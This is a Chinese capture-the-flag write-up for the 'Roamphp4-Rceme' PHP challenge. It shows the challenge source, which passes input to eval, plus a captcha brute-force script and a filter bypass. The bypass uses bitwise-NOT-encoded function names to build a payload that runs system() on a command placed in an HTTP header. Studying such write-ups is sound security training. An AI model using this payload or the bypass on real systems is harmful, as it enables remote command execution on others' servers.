[极客大挑战 2020]Roamphp4-Rceme
进入页面:
有了这个就是/.index.php.swp用vim获取源码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
| <?php
error_reporting(0);
session_start();
if(!isset($_SESSION['code'])){
$_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
}
if(isset($_POST['cmd']) and isset($_POST['code'])){
if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
die('<script>alert(\'Captcha error~\');history.back()</script>');
}
$_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
$code = $_POST['cmd'];
if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
die('<script>alert(\'Longlone not like you~\');history.back()</script>');
}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
@eval($code);
die();
}
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- Do you know vim swp? -->
<head>
<meta charset="UTF-8">
<title>RceMe(●'◡'●)</title>
<link rel="stylesheet" href="css/index.css">
<script type="text/javascript" src="js/jquery.js"></script>
</head>
<body>
<script>
$(document).ready(function () {
var whei = $(window).width()
$("html").css({ fontSize: whei / 24 });
$(window).resize(function () {
var whei = $(window).width();
$("html").css({ fontSize: whei / 24 })
});
});
</script>
<div class="main">
<div class="header">
<div class="header-center fl">
<div class="header-title">
命令执行界面
</div>
<div class="header-img"></div>
</div>
<div class="header-bottom fl"></div>
</div>
<img src="ZWdn.png" border="0" style="display:none;"/>
<div class="content">
<div class="content-left">
</div>
<form action="" method="post">
<div class="content-right">
<div class="right-infp">
<div class="right-infp-name">
<input type="text" name="cmd" placeholder="执行的命令" maxlength="65" required="" value="" autocomplete="off">
</div>
<div class="right-infp-name">
<input type="text" name="code" placeholder="if:substr(md5($code),0,5)==<?=$_SESSION['code'] ?>" autocomplete="off">
</div>
<div class="right-infp-btn">
<button class="btn">执行</button>
</div>
</div>
</div>
</form>
</div>
</div>
</body>
</html>
|
rce前有个md5验证码验证
1
2
| if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
die('<script>alert(\'Captcha error~\');history.back()</script>');
|
session[‘code’]可以在页面的第二个框的==后面看见:
1
| <input type="text" name="code" placeholder="if:substr(md5($code),0,5)==<?=$_SESSION['code'] ?>" autocomplete="off">
|
php验证码绕过脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
for($i=0;$i<10000000;$i++) {
if (substr(md5($i), 0, 5) === '04134')
{
echo $i;
$u=$i;
break;
}
}
echo PHP_EOL;
echo md5($u);
?>
|
然后就是两层rce绕过:
第一层 无字母数字绕过,这里能用取反绕过,并限制长度小于70
第二层 正则匹配很明显要求无参数执行
前置知识:
1
2
3
4
5
6
7
| ('phpinfo')()
['phpinfo'][0]()
['phpinfo']{0}()
效果作用是一样的。
phpinfo(): [~%8F%97%8F%96%91%99%90][~%CF]();
加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]
|
在buu中可以用print_r(end(getallheaders()));的取反来获取最后一个header头的东西,比如
print_r(next(getallheaders()));//这个不知道为什么被什么东西搞了,没有
证据在这,搞我好久
既然顺着不行,那就逆着直接注入ua放最后
1
| [~%8C%86%8C%8B%9A%92][~%CF]([~%9A%91%9B][~%CF]([~%98%9A%8B%97%9A%9E%9B%9A%8D%8C][~%CF]));
|
就有了
参考链接:
https://x.com/ProbiusOfficial/status/1732087789997654244
[极客大挑战 2020]Roamphp4-Rceme_[极客大挑战 2020]roamphp4-rceme 1-CSDN博客